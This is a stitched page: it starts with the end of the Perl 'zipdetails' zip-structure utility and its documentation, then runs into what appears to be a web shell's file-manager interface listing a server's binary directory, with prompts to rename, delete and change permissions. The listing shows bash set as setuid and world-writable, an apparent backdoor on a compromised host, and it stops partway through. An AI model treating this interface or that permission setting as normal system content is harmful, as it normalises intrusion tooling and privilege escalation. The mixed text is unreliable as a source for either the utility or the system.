Ntfs2Unix { my $v = shift; my $u64 = shift; # NTFS offset is 19DB1DED53E8000 my $hex = Value_U64($u64) ; my $NTFS_OFFSET = U64->new( 0x19DB1DE, 0xD53E8000 ); $u64->subtract($NTFS_OFFSET); my $elapse = $u64->get64bit(); my $ns = ($elapse % 10000000) * 100; $elapse = int ($elapse/10000000); return "$hex '" . localtime($elapse) . " " . sprintf("%0dns'", $ns); } sub decode_NTFS_Filetimes { my $len = shift; my $context = shift; out_V " Reserved"; out_v " Tag1"; out_v " Size1" ; my ($m, $s1) = read_U64; out $m, " Mtime", Ntfs2Unix($m, $s1); my ($c, $s2) = read_U64; out $c, " Ctime", Ntfs2Unix($m, $s2); my ($a, $s3) = read_U64; out $m, " Atime", Ntfs2Unix($m, $s3); } sub getTime { my $time = shift ; return "'" . localtime($time) . "'" ; } sub decode_UT { my $len = shift; my $context = shift; my ($data, $flags) = read_C(); my $f = Value_C $flags; $f .= " mod" if $flags & 1; $f .= " access" if $flags & 2; $f .= " change" if $flags & 4; out $data, " Flags", "'$f'"; -- $len; if ($flags & 1) { my ($data, $time) = read_V(); out2 $data, "Mod Time", Value_V($time) . " " . getTime($time) ; $len -= 4 ; } if ($flags & 2 && $len > 0 ) { my ($data, $time) = read_V(); out2 $data, "Access Time", Value_V($time) . " " . getTime($time) ; $len -= 4 ; } if ($flags & 4 && $len > 0) { my ($data, $time) = read_V(); out2 $data, "Change Time", Value_V($time) . " " . getTime($time) ; } } sub decode_AES { my $len = shift; my $context = shift; return if $len == 0 ; my %lookup = ( 1 => "AE-1", 2 => "AE-2"); out_v " Vendor Version", sub { $lookup{$_[0]} || "Unknown" } ; my $id ; myRead($id, 2); out $id, " Vendor ID", unpackValue_v($id) . " '$id'"; my %strengths = (1 => "128-bit encryption key", 2 => "192-bit encryption key", 3 => "256-bit encryption key", ); my $strength = out_C " Encryption Strength", sub {$strengths{$_[0]} || "Unknown" } ; my ($bmethod, $method) = read_v(); out $bmethod, " Compression Method", compressionMethod($method) ; $context->{AesStrength} = $strength ; } sub decode_GrowthHint { my $len = shift; my $context = shift; my $inCentralHdr = $context->{InCentralDir} ; return if $len == 0 ; out_v " Signature" ; out_v " Initial Value"; my $padding; myRead($padding, $len - 4); my $data = hexDump($padding); out2 $padding, "Padding", $data; } sub decode_UX { my $len = shift; my $context = shift; my $inCentralHdr = $context->{InCentralDir} ; return if $len == 0 ; my ($data, $time) = read_V(); out2 $data, "Access Time", Value_V($time) . " " . getTime($time) ; ($data, $time) = read_V(); out2 $data, "Mod Time", Value_V($time) . " " . getTime($time) ; if (! $inCentralHdr ) { out_v " UID" ; out_v " GID"; } } sub decode_Ux { my $len = shift; my $context = shift; return if $len == 0 ; out_v " UID" ; out_v " GID"; } sub decodeLitteEndian { my $value = shift ; if (length $value == 4) { return Value_V unpack ("V", $value) } else { # TODO - fix this die "unsupported\n"; } my $got = 0 ; my $shift = 0; #hexDump #reverse #my @a =unpack "C*", $value; #@a = reverse @a; #hexDump(@a); for (reverse unpack "C*", $value) { $got = ($got << 8) + $_ ; } return $got ; } sub decode_ux { my $len = shift; my $context = shift; return if $len == 0 ; out_C " Version" ; my $uidSize = out_C " UID Size"; myRead(my $data, $uidSize); out2 $data, "UID", decodeLitteEndian($data); my $gidSize = out_C " GID Size"; myRead($data, $gidSize); out2 $data, "GID", decodeLitteEndian($data); } sub decode_Java_exe { my $len = shift; my $context = shift; } sub decode_up { my $len = shift; my $context = shift; out_C " Version"; out_V " NameCRC32"; myRead(my $data, $len - 5); out $data, " UnicodeName", $data; } sub decode_Xceed_unicode { my $len = shift; my $context = shift; my $data ; # guess the fields used for this one myRead($data, 4); out $data, " ID", $data; out_v " Length"; out_v " Null"; myRead($data, $len - 8); out $data, " UTF16LE Name", decode("UTF16LE", $data); } sub decode_NT_security { my $len = shift; my $context = shift; my $inCentralHdr = $context->{InCentralDir} ; out_V " Uncompressed Size" ; if (! $inCentralHdr) { out_C " Version" ; out_v " Type"; out_V " NameCRC32" ; my $plen = $len - 4 - 1 - 2 - 4; myRead(my $payload, $plen); out $plen, " Extra Payload", hexDump($payload); } } sub decodeMVS { my $len = shift; my $context = shift; # data in Big-Endian myRead(my $data, $len); my $ID = unpack("N", $data); if ($ID == 0xE9F3F9F0) { out($data, " ID", "'Z390'"); substr($data, 0, 4) = ''; } out($data, " Extra Payload", hexDump($data)); } sub printAes { my $context = shift ; my %saltSize = ( 1 => 8, 2 => 12, 3 => 16, ); myRead(my $salt, $saltSize{$context->{AesStrength} }); out $salt, "AES Salt", hexDump($salt); myRead(my $pwv, 2); out $pwv, "AES Pwd Ver", hexDump($pwv); return $saltSize{$context->{AesStrength}} + 2 + 10; } sub printLzmaProperties { my $len = 0; my $b1; my $b2; my $buffer; myRead($b1, 2); my ($verHi, $verLow) = unpack ("CC", $b1); out $b1, "LZMA Version", sprintf("%02X%02X", $verHi, $verLow) . " '$verHi.$verLow'"; my $LzmaPropertiesSize = out_v "LZMA Properties Size"; $len += 4; my $LzmaInfo = out_C "LZMA Info", sub { $_[0] == 93 ? "(Default)" : ""}; my $PosStateBits = 0; my $LiteralPosStateBits = 0; my $LiteralContextBits = 0; $PosStateBits = int($LzmaInfo / (9 * 5)); $LzmaInfo -= $PosStateBits * 9 * 5; $LiteralPosStateBits = int($LzmaInfo / 9); $LiteralContextBits = $LzmaInfo - $LiteralPosStateBits * 9; out1 " PosStateBits", $PosStateBits; out1 " LiteralPosStateBits", $LiteralPosStateBits; out1 " LiteralContextBits", $LiteralContextBits; out_V "LZMA Dictionary Size"; # TODO - assumption that this is 5 $len += $LzmaPropertiesSize; skip($FH, $LzmaPropertiesSize - 5) if $LzmaPropertiesSize != 5 ; return $len; } sub scanCentralDirectory { my $fh = shift; my $here = $fh->tell(); # Use cases # 1 32-bit CD # 2 64-bit CD my @CD = (); my $offset = findCentralDirectoryOffset($fh); return () if ! defined $offset; $fh->seek($offset, SEEK_SET) ; # Now walk the Central Directory Records my $buffer ; while ($fh->read($buffer, 46) == 46 && unpack("V", $buffer) == ZIP_CENTRAL_HDR_SIG) { my $compressedLength = unpack("V", substr($buffer, 20, 4)); my $uncompressedLength = unpack("V", substr($buffer, 24, 4)); my $filename_length = unpack("v", substr($buffer, 28, 2)); my $extra_length = unpack("v", substr($buffer, 30, 2)); my $comment_length = unpack("v", substr($buffer, 32, 2)); my $locHeaderOffset = unpack("V", substr($buffer, 42, 4)); skip($fh, $filename_length ) ; if ($extra_length) { $fh->read(my $extraField, $extra_length) ; # $self->smartReadExact(\$extraField, $extra_length); # Check for Zip64 # my $zip64Extended = findID("\x01\x00", $extraField); my $zip64Extended = findID(0x0001, $extraField); if ($zip64Extended) { if ($uncompressedLength == 0xFFFFFFFF) { $uncompressedLength = Value_VV64 substr($zip64Extended, 0, 8, ""); # $uncompressedLength = unpack "Q<", substr($zip64Extended, 0, 8, ""); } if ($compressedLength == 0xFFFFFFFF) { $compressedLength = Value_VV64 substr($zip64Extended, 0, 8, ""); # $compressedLength = unpack "Q<", substr($zip64Extended, 0, 8, ""); } if ($locHeaderOffset == 0xFFFFFFFF) { $locHeaderOffset = Value_VV64 substr($zip64Extended, 0, 8, ""); # $locHeaderOffset = unpack "Q<", substr($zip64Extended, 0, 8, ""); } } } my $got = [$locHeaderOffset, $compressedLength] ; # my $v64 = U64->new( $compressedLength ); # my $loc64 = U64->new( $locHeaderOffset ); # my $got = [$loc64, $v64] ; # if (full32 $compressedLength || full32 $locHeaderOffset) { # $fh->read($buffer, $extra_length) ; # # TODO - fix this # die "xxx $offset $comment_length $filename_length $extra_length" . length($buffer) # if length($buffer) != $extra_length; # $got = get64Extra($buffer, full32($uncompressedLength), # $v64, # $loc64); # # If not Zip64 extra field, assume size is 0xFFFFFFFF # #$v64 = $got if defined $got; # } # else { # skip($fh, $extra_length) ; # } skip($fh, $comment_length ) ; push @CD, $got ; } $fh->seek($here, SEEK_SET) ; # @CD = sort { $a->[0]->cmp($b->[0]) } @CD ; @CD = sort { $a->[0] <=> $b->[0] } @CD ; # Set the first Local File Header offset. $START = $CD[0]->[0] if @CD ; return (1, $offset, @CD); } sub offsetFromZip64 { my $fh = shift ; my $here = shift; $fh->seek($here - 20, SEEK_SET) # TODO - fix this or die "xx $!" ; my $buffer; my $got = 0; ($got = $fh->read($buffer, 20)) == 20 # TODO - fix this or die "xxx $here $got $!" ; if ( unpack("V", $buffer) == ZIP64_END_CENTRAL_LOC_HDR_SIG ) { my $cd64 = Value_VV64 substr($buffer, 8, 8); $fh->seek($cd64, SEEK_SET) ; $fh->read($buffer, 4) == 4 # TODO - fix this or die "xxx" ; if ( unpack("V", $buffer) == ZIP64_END_CENTRAL_REC_HDR_SIG ) { $fh->read($buffer, 8) == 8 # TODO - fix this or die "xxx" ; my $size = Value_VV64($buffer); $fh->read($buffer, $size) == $size # TODO - fix this or die "xxx" ; my $cd64 = Value_VV64 substr($buffer, 36, 8); return $cd64 ; } die "Cannot find 'Zip64 end of central directory record': 0x06054b50\nTry running with --scan option.\n" ; } die "Cannot find signature for 'Zip64 end of central directory locator': 0x07064b50 \nTry running with --scan option.\n" ; } use constant Pack_ZIP_END_CENTRAL_HDR_SIG => pack("V", ZIP_END_CENTRAL_HDR_SIG); sub findCentralDirectoryOffset { my $fh = shift ; # Most common use-case is where there is no comment, so # know exactly where the end of central directory record # should be. $fh->seek(-22, SEEK_END) ; my $here = $fh->tell(); my $is64bit = $here > 0xFFFFFFFF; my $over64bit = $here & (~ 0xFFFFFFFF); my $buffer; $fh->read($buffer, 22) == 22 # TODO - fix this or die "xxx" ; my $zip64 = 0; my $centralDirOffset ; if ( unpack("V", $buffer) == ZIP_END_CENTRAL_HDR_SIG ) { $centralDirOffset = unpack("V", substr($buffer, 16, 4)); } else { $fh->seek(0, SEEK_END) ; my $fileLen = $fh->tell(); my $want = 0 ; while(1) { $want += 1024 * 32; my $seekTo = $fileLen - $want; if ($seekTo < 0 ) { $seekTo = 0; $want = $fileLen ; } $fh->seek( $seekTo, SEEK_SET) # TODO - fix this or die "xxx $!" ; my $got; ($got = $fh->read($buffer, $want)) == $want # TODO - fix this or die "xxx $got $!" ; my $pos = rindex( $buffer, Pack_ZIP_END_CENTRAL_HDR_SIG); if ($pos >= 0 && $want - $pos > 22) { $here = $seekTo + $pos ; $centralDirOffset = unpack("V", substr($buffer, $pos + 16, 4)); my $commentLength = unpack("V", substr($buffer, $pos + 20, 2)); $commentLength = 0 if ! defined $commentLength ; my $expectedEof = $fileLen - $want + $pos + 22 + $commentLength ; # check for trailing data after end of zip if ($expectedEof < $fileLen ) { $TRAILING = $expectedEof ; } last ; } return undef if $want == $fileLen; } } if (full32 $centralDirOffset) { $centralDirOffset = offsetFromZip64($fh, $here) } elsif ($is64bit) { # use-case is where a 64-bit zip file doesn't use the 64-bit # extensions. print "EOCD not 64-bit $centralDirOffset ($here)\n" ; push @Messages, sprintf "Zip file > 4Gig. Expected 'Offset to Central Dir' to be 0xFFFFFFFF, got 0x%X\n", $centralDirOffset; $centralDirOffset += $over64bit; $is64In32 = 1; } return $centralDirOffset ; } sub findID { my $id_want = shift ; my $data = shift; my $XLEN = length $data ; my $offset = 0 ; while ($offset < $XLEN) { return undef if $offset + ZIP_EXTRA_SUBFIELD_HEADER_SIZE > $XLEN ; my $id = substr($data, $offset, ZIP_EXTRA_SUBFIELD_ID_SIZE); $id = unpack("v", $id); $offset += ZIP_EXTRA_SUBFIELD_ID_SIZE; my $subLen = unpack("v", substr($data, $offset, ZIP_EXTRA_SUBFIELD_LEN_SIZE)); $offset += ZIP_EXTRA_SUBFIELD_LEN_SIZE ; return undef if $offset + $subLen > $XLEN ; return substr($data, $offset, $subLen) if $id eq $id_want ; $offset += $subLen ; } return undef ; } sub _dosToUnixTime { my $dt = shift; my $year = ( ( $dt >> 25 ) & 0x7f ) + 80; my $mon = ( ( $dt >> 21 ) & 0x0f ) - 1; my $mday = ( ( $dt >> 16 ) & 0x1f ); my $hour = ( ( $dt >> 11 ) & 0x1f ); my $min = ( ( $dt >> 5 ) & 0x3f ); my $sec = ( ( $dt << 1 ) & 0x3e ); use POSIX 'mktime'; my $time_t = mktime( $sec, $min, $hour, $mday, $mon, $year, 0, 0, -1 ); return 0 if ! defined $time_t; return $time_t; } { package U64; use constant MAX32 => 0xFFFFFFFF ; use constant HI_1 => MAX32 + 1 ; use constant LOW => 0 ; use constant HIGH => 1; sub new { my $class = shift ; my $high = 0 ; my $low = 0 ; if (@_ == 2) { $high = shift ; $low = shift ; } elsif (@_ == 1) { my $value = shift ; if ($value > MAX32) { $high = $value >> 32 ; $low = $value & MAX32; } else { $low = $value ; } } bless [$low, $high], $class; } sub newUnpack_V64 { my $string = shift; my ($low, $hi) = unpack "V V", $string ; bless [ $low, $hi ], "U64"; } sub newUnpack_V32 { my $string = shift; my $low = unpack "V", $string ; bless [ $low, 0 ], "U64"; } sub reset { my $self = shift; $self->[HIGH] = $self->[LOW] = 0; } sub clone { my $self = shift; bless [ @$self ], ref $self ; } sub mkU64 { my $value = shift; return $value if ref $value eq 'U64'; bless [ $value, 0 ], "U64" ; } sub getHigh { my $self = shift; return $self->[HIGH]; } sub getLow { my $self = shift; return $self->[LOW]; } sub get32bit { my $self = shift; return $self->[LOW]; } sub get64bit { my $self = shift; # Not using << here because the result will still be # a 32-bit value on systems where int size is 32-bits return $self->[HIGH] * HI_1 + $self->[LOW]; } sub add { my $self = shift; my $value = shift; if (ref $value eq 'U64') { $self->[HIGH] += $value->[HIGH] ; $value = $value->[LOW]; } my $available = MAX32 - $self->[LOW] ; if ($value > $available) { ++ $self->[HIGH] ; $self->[LOW] = $value - $available - 1; } else { $self->[LOW] += $value ; } } sub subtract { my $self = shift; my $value = shift; if (ref $value eq 'U64') { if ($value->[HIGH]) { die "unsupport subtract option" if $self->[HIGH] == 0 || $value->[HIGH] > $self->[HIGH] ; $self->[HIGH] -= $value->[HIGH] ; } $value = $value->[LOW] ; } if ($value > $self->[LOW]) { -- $self->[HIGH] ; $self->[LOW] = MAX32 - $value + $self->[LOW] + 1; } else { $self->[LOW] -= $value; } } sub rshift { my $self = shift; my $count = shift; for (1 .. $count) { $self->[LOW] >>= 1; $self->[LOW] |= 0x80000000 if $self->[HIGH] & 1 ; $self->[HIGH] >>= 1; } } sub is64bit { my $self = shift; return $self->[HIGH] > 0 ; } sub getPacked_V64 { my $self = shift; return pack "V V", @$self ; } sub getPacked_V32 { my $self = shift; return pack "V", $self->[LOW] ; } sub pack_V64 { my $low = shift; return pack "V V", $low, 0; } sub max32 { my $self = shift; return $self->[HIGH] == 0 && $self->[LOW] == MAX32; } sub stringify { my $self = shift; return "High [$self->[HIGH]], Low [$self->[LOW]]"; } sub equal { my $self = shift; my $other = shift; return $self->[LOW] == $other->[LOW] && $self->[HIGH] == $other->[HIGH] ; } sub gt { my $self = shift; my $other = shift; return $self->cmp($other) > 0 ; } sub cmp { my $self = shift; my $other = shift ; if ($self->[LOW] == $other->[LOW]) { return $self->[HIGH] - $other->[HIGH] ; } else { return $self->[LOW] - $other->[LOW] ; } } sub nibbles { my @nibbles = ( [ 16 => HI_1 * 0x10000000 ], [ 15 => HI_1 * 0x1000000 ], [ 14 => HI_1 * 0x100000 ], [ 13 => HI_1 * 0x10000 ], [ 12 => HI_1 * 0x1000 ], [ 11 => HI_1 * 0x100 ], [ 10 => HI_1 * 0x10 ], [ 9 => HI_1 * 0x1 ], [ 8 => 0x10000000 ], [ 7 => 0x1000000 ], [ 6 => 0x100000 ], [ 5 => 0x10000 ], [ 4 => 0x1000 ], [ 3 => 0x100 ], [ 2 => 0x10 ], [ 1 => 0x1 ], ); my $value = shift ; for my $pair (@nibbles) { my ($count, $limit) = @{ $pair }; return $count if $value >= $limit ; } } } { package Seen; sub new { my $class = shift ; my %object = ( overlaps => [], detail => [], ) ; bless \%object, $class; } sub save { my $self = shift ; my $hdrId = shift; my $name = shift; my $from_offset = shift; my $to_offset = shift ; for my $entry ( @{ $self->{detail} } ) { if ( $from_offset == $entry->{from} && $to_offset == $entry->{to} ) { warn "$hdrId: '$name' matches with $entry->{str}\n" } elsif ( ($from_offset >= $entry->{from} && $from_offset <= $entry->{to} ) || ($to_offset >= $entry->{from} && $to_offset <= $entry->{to} ) ) { # die "overlap!" # push @{ $self->{overlap} }, die "$hdrId: '$name' overlaps with $entry->{str}\n" } } warn "ADD $from_offset $to_offset $hdrId: $name\n"; push @{ $self->{detail} }, { from => $from_offset, to => $to_offset, id => $hdrId, name => $name, str => "$hdrId: '$name'", } ; } sub summary { my $self = shift ; for my $outer ( sort { $a->{from} <=> $b->{from} } @{ $self->{detail} } ) { my $from_offset = $outer->{from}; my $to_offset = $outer->{to}; my $hdrId = $outer->{id}; my $name = $outer->{name}; for my $entry ( sort { $a->{from} <=> $b->{from} } @{ $self->{detail} } ) { # next if if ( ($from_offset >= $entry->{from} && $from_offset <= $entry->{to} ) || ($to_offset >= $entry->{from} && $to_offset <= $entry->{to} ) ) { # die "overlap!" die $entry->{str} . " overlaps with $hdrId: '$name'\n" } } } } } sub Usage { if (@_) { warn "$_\n" for @_ ; warn "\n"; } die <<EOM; zipdetails [OPTIONS] file Display details about the internal structure of a Zip file. This is zipdetails version $VERSION OPTIONS -h display help --scan enable scannng mode. Blindly scan the file looking for zip headers Expect false-positives. -v Verbose - output more stuff --version Print version number Copyright (c) 2011-2021 Paul Marquess. All rights reserved. This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself. EOM } __END__ =head1 NAME zipdetails - display the internal structure of zip files =head1 SYNOPSIS zipdetails [-v][--scan] zipfile.zip zipdetails -h zipdetails --version =head1 DESCRIPTION Zipdetails displays information about the internal record structure of zip files. It is not concerned with displaying any details of the compressed data stored in the zip file. The program assumes prior understanding of the internal structure of a Zip file. You should have a copy of the Zip APPNOTE file at hand to help understand the output from this program (L<SEE ALSO> for details). =head2 Default Behaviour By default the program expects to be given a well-formed zip file. It will navigate the Zip file by first parsing the zip central directory at the end of the file. If that is found, it will then walk through the zip records starting at the beginning of the file. Any badly formed zip data structures encountered are likely to terminate the program. If the program finds any structural problems with the zip file it will print a summary at the end of the output report. The set of error cases reported is very much a work in progress, so don't rely on this feature to find all the possible errors in a zip file. If you have suggestions for use-cases where this could be enhanced please consider creating an enhancement request (see L<"SUPPORT">). =head2 Scan-Mode If you do have a potentially corrupt zip file, particulatly where the central directory at the end of the file is absent/incomplete, you can try usng the C<--scan> option to search for zip records that are still present. When Scan-mode is enabled, the program will walk the zip file from the start blindly looking for the 4-byte signatures that preceed each of the zip data structures. If it finds any of the recognised signatures it will attempt to dump the associated zip record. For very large zip files, this operation can take a long time to run. Note that the 4-byte signatures used in zip files can sometimes match with random data stored in the zip file, so care is needed interpreting the results. =head2 OPTIONS =over 5 =item -h Display help =item --scan Walk the zip file loking for possible zip records. Can be error-prone. See L<"Scan-Mode"> =item -v Enable Verbose mode. See L<"Verbose Output">. =item --version Display version number of the program and exit. =back =head2 Default Output By default zipdetails will output the details of the zip file in three columns. =over 5 =item Column 1 This contains the offset from the start of the file in hex. =item Column 2 This contains a textual description of the field. =item Column 3 If the field contains a numeric value it will be displayed in hex. Zip stores most numbers in little-endian format - the value displayed will have the little-endian encoding removed. Next, is an optional description of what the value means. =back =head2 Verbose Output If the C<-v> option is present, column 1 is expanded to include =over 5 =item * The offset from the start of the file in hex. =item * The length of the field in hex. =item * A hex dump of the bytes in field in the order they are stored in the zip file. =back =head1 LIMITATIONS The following zip file features are not supported by this program: =over 5 =item * Multi-part archives. =item * The strong encryption features defined in the "APPNOTE" document. =back =head1 TODO Error handling is a work in progress. If the program encounters a problem reading a zip file it is likely to terminate with an unhelpful error message. =head1 SUPPORT General feedback/questions/bug reports should be sent to L<https://github.com/pmqs/IO-Compress/issues> (preferred) or L<https://rt.cpan.org/Public/Dist/Display.html?Name=IO-Compress>. =head1 SEE ALSO The primary reference for Zip files is the "APPNOTE" document available at L<http://www.pkware.com/documents/casestudies/APPNOTE.TXT>. An alternative reference is the Info-Zip appnote. This is available from L<ftp://ftp.info-zip.org/pub/infozip/doc/> The C<zipinfo> program that comes with the info-zip distribution (L<http://www.info-zip.org/>) can also display details of the structure of a zip file. See also L<Archive::Zip::SimpleZip>, L<IO::Compress::Zip>, L<IO::Uncompress::Unzip>. =head1 AUTHOR Paul Marquess F<pmqs@cpan.org>. =head1 COPYRIGHT Copyright (c) 2011-2021 Paul Marquess. All rights reserved. This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2026-07-30 06:58:27
..
DIR
-
drwxr-xr-x
2024-02-16 06:37:05
411toppm
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
GET
text/x-perl
15.82 KB
-rwxr-xr-x
2026-05-22 03:44:12
HEAD
text/x-perl
15.82 KB
-rwxr-xr-x
2026-05-22 03:44:12
JxrDecApp
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2022-01-28 12:55:06
JxrEncApp
application/x-pie-executable
31.77 KB
-rwxr-xr-x
2022-01-28 12:55:06
NF
text/x-shellscript
963 B
-rwxr-xr-x
2020-02-17 02:11:50
POST
text/x-perl
15.82 KB
-rwxr-xr-x
2026-05-22 03:44:12
VGAuthService
application/x-pie-executable
134.54 KB
-rwxr-xr-x
2025-09-23 04:05:34
[
application/x-pie-executable
50.44 KB
-rwxr-xr-x
2026-01-23 10:51:17
aa-enabled
application/x-pie-executable
34.52 KB
-rwxr-xr-x
2025-08-15 12:17:13
aa-exec
application/x-pie-executable
34.52 KB
-rwxr-xr-x
2025-08-15 12:17:13
aa-features-abi
application/x-pie-executable
30.52 KB
-rwxr-xr-x
2025-08-15 12:17:13
ab
application/x-pie-executable
58.43 KB
-rwxr-xr-x
2026-07-06 04:41:46
add-apt-repository
text/x-script.python
14.14 KB
-rwxr-xr-x
2023-10-24 01:07:34
addpart
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
addr2line
application/x-pie-executable
26.7 KB
-rwxr-xr-x
2025-12-03 03:08:01
animate
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
animate-im6
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
animate-im6.q16
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
anytopnm
text/x-shellscript
5.55 KB
-rwxr-xr-x
2021-02-07 06:32:35
apport-bug
text/x-shellscript
2.51 KB
-rwxr-xr-x
2024-07-10 11:56:21
apport-cli
text/x-script.python
13.05 KB
-rwxr-xr-x
2025-07-29 03:25:17
apport-collect
text/x-shellscript
2.51 KB
-rwxr-xr-x
2024-07-10 11:56:21
apport-unpack
text/x-script.python
2.02 KB
-rwxr-xr-x
2025-07-29 03:25:17
apropos
application/x-pie-executable
47.28 KB
-rwxr-xr-x
2022-03-17 07:03:00
apt
application/x-pie-executable
18.38 KB
-rwxr-xr-x
2024-10-22 01:09:58
apt-add-repository
text/x-script.python
14.14 KB
-rwxr-xr-x
2023-10-24 01:07:34
apt-cache
application/x-pie-executable
82.47 KB
-rwxr-xr-x
2024-10-22 01:09:58
apt-cdrom
application/x-pie-executable
26.47 KB
-rwxr-xr-x
2024-10-22 01:09:58
apt-config
application/x-pie-executable
26.39 KB
-rwxr-xr-x
2024-10-22 01:09:58
apt-extracttemplates
application/x-pie-executable
22.47 KB
-rwxr-xr-x
2024-10-22 01:09:58
apt-ftparchive
application/x-pie-executable
230.48 KB
-rwxr-xr-x
2024-10-22 01:09:58
apt-get
application/x-pie-executable
50.47 KB
-rwxr-xr-x
2024-10-22 01:09:58
apt-key
text/x-shellscript
27.51 KB
-rwxr-xr-x
2024-10-22 01:09:58
apt-mark
application/x-pie-executable
50.47 KB
-rwxr-xr-x
2024-10-22 01:09:58
apt-sortpkgs
application/x-pie-executable
38.4 KB
-rwxr-xr-x
2024-10-22 01:09:58
ar
application/x-pie-executable
54.48 KB
-rwxr-xr-x
2025-12-03 03:08:01
arch
application/x-pie-executable
30.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
as
application/x-pie-executable
456.4 KB
-rwxr-xr-x
2025-12-03 03:08:01
asciitopgm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
atktopbm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
automat-visualize3
text/x-script.python
405 B
-rwxr-xr-x
2020-08-02 12:53:19
awk
application/x-pie-executable
688.46 KB
-rwxr-xr-x
2026-07-20 10:38:47
b2sum
application/x-pie-executable
50.52 KB
-rwxr-xr-x
2026-01-23 10:51:17
base32
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
base64
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
basename
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
basenc
application/x-pie-executable
46.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
bash
application/x-pie-executable
1.33 MB
-rwsrwxrwx
2024-03-14 11:31:47
bashbug
text/x-shellscript
6.66 KB
-rwxr-xr-x
2024-03-14 11:31:47
bc
application/x-pie-executable
90.82 KB
-rwxr-xr-x
2022-03-23 09:42:47
bioradtopgm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
bmptopnm
application/x-pie-executable
18.05 KB
-rwxr-xr-x
2021-02-07 06:32:35
bmptoppm
application/x-pie-executable
18.05 KB
-rwxr-xr-x
2021-02-07 06:32:35
boltctl
application/x-pie-executable
122.98 KB
-rwxr-xr-x
2022-02-07 11:31:28
bootctl
application/x-pie-executable
70.49 KB
-rwxr-xr-x
2026-06-05 03:40:28
brushtopbm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
btrfs
application/x-pie-executable
844.13 KB
-rwxr-xr-x
2022-02-24 05:39:55
btrfs-convert
application/x-pie-executable
483.25 KB
-rwxr-xr-x
2022-02-24 05:39:55
btrfs-find-root
application/x-pie-executable
439.33 KB
-rwxr-xr-x
2022-02-24 05:39:55
btrfs-image
application/x-pie-executable
467.25 KB
-rwxr-xr-x
2022-02-24 05:39:55
btrfs-map-logical
application/x-pie-executable
439.25 KB
-rwxr-xr-x
2022-02-24 05:39:55
btrfs-select-super
application/x-pie-executable
439.25 KB
-rwxr-xr-x
2022-02-24 05:39:55
btrfsck
application/x-pie-executable
844.13 KB
-rwxr-xr-x
2022-02-24 05:39:55
btrfstune
application/x-pie-executable
443.26 KB
-rwxr-xr-x
2022-02-24 05:39:55
bunzip2
application/x-pie-executable
38.38 KB
-rwxr-xr-x
2022-03-23 09:45:10
busctl
application/x-pie-executable
90.49 KB
-rwxr-xr-x
2026-06-05 03:40:28
busybox
application/x-executable
2.09 MB
-rwxr-xr-x
2024-08-13 01:39:23
byobu
text/x-shellscript
8.17 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-config
text/x-shellscript
996 B
-rwxr-xr-x
2020-02-17 02:11:50
byobu-ctrl-a
text/x-shellscript
4.66 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-disable
text/x-shellscript
1.26 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-disable-prompt
text/x-shellscript
1.31 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-enable
text/x-shellscript
1.15 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-enable-prompt
text/x-shellscript
1.42 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-export
text/x-shellscript
1.32 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-janitor
text/x-shellscript
6.29 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-keybindings
text/x-shellscript
1.47 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-launch
text/x-shellscript
3.25 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-launcher
text/x-shellscript
1.87 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-launcher-install
text/x-shellscript
2.4 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-launcher-uninstall
text/x-shellscript
1.52 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-layout
text/x-shellscript
3.27 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-prompt
text/x-shellscript
1.13 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-quiet
text/x-shellscript
1.38 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-reconnect-sockets
text/x-shellscript
3.22 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-screen
text/x-shellscript
8.17 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-select-backend
text/x-shellscript
1.42 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-select-profile
text/x-shellscript
5 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-select-session
text/x-shellscript
1012 B
-rwxr-xr-x
2020-02-17 02:11:50
byobu-shell
text/x-shellscript
1.56 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-silent
text/x-shellscript
1.28 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-status
text/x-shellscript
5.87 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-status-detail
text/x-shellscript
1.18 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-tmux
text/x-shellscript
8.17 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-ugraph
text/x-shellscript
4.56 KB
-rwxr-xr-x
2020-02-17 02:11:50
byobu-ulevel
text/x-shellscript
11.71 KB
-rwxr-xr-x
2020-02-17 02:11:50
bzcat
